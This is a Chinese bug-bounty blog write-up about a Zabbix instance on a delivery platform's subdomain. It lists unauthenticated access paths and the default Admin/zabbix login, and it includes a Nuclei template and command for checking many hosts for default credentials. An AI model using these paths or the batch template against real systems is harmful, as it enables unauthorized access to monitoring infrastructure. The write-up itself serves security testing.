某配送平台未授权访问和弱口令(附赠nuclei默认密码验证脚本)

找到一个某src的子站,通过信息收集插件,发现ZABBIX-监控系统,可以日一下

使用谷歌搜索历史漏洞:zabbix漏洞


通过目录扫描扫描到后台,谷歌搜索一下有没有默认弱口令


 


成功进去了,挖洞就是这么简单

搜索文章还报过未授权访问漏洞,打一波

 
  1. /overview.php?ddreset=1
  2. /srv_status.php?ddreset=1
  3. /latest.php?ddreset=1
  4. /zabbix.php?action=problem.view&ddreset=1


又成功进去了,已经清除缓存在拼接路径的,进去成功寻找功能点,在搜索位置输入任何东西,前端页面就会显示什么,猜测可能存在反射xss,但没什么用,继续测试ssti注入


不存在,这个站还可以getshell,但是点到位置,后台进去了,人也进去了
黑盒测试ssti注入这个工具推荐一下,用这个工具还挖出过几个洞,这个感觉已经是公开最好的工具了:GitHub - vladko312/SSTImap: Automatic SSTI detection tool with interactive interface

顺便写了一个nuclei批量默认密码验证脚本

【Nuclei-Poc】

 
  1. id: zabbix-default-credential-check
  2. info:
  3. name: Zabbix Default Credential Check
  4. author:
  5. severity: high
  6. description: Check for default credentials in Zabbix.
  7. tags: zabbix,default,cred
  8. requests:
  9. - method: POST
  10. path:
  11. - "{{BaseURL}}/zabbix/index.php"
  12. body: |
  13. name=Admin&password=zabbix&autologin=1&enter=Sign+in
  14. headers:
  15. Content-Type: application/x-www-form-urlencoded
  16. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  17. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  18. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  19. Accept-Encoding: gzip, deflate
  20. Connection: close
  21. Upgrade-Insecure-Requests: 1
  22. Origin: "{{BaseURL}}"
  23. Referer: "{{BaseURL}}/zabbix/"
  24. matchers-condition: and
  25. matchers:
  26. - type: word
  27. words:
  28. - "Location: zabbix.php?action=dashboard.view"
  29. part: header
  30. - type: status
  31. status:
  32. - 302

【验证】

.\nuclei -l xx.txt -t xx.yaml

  申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值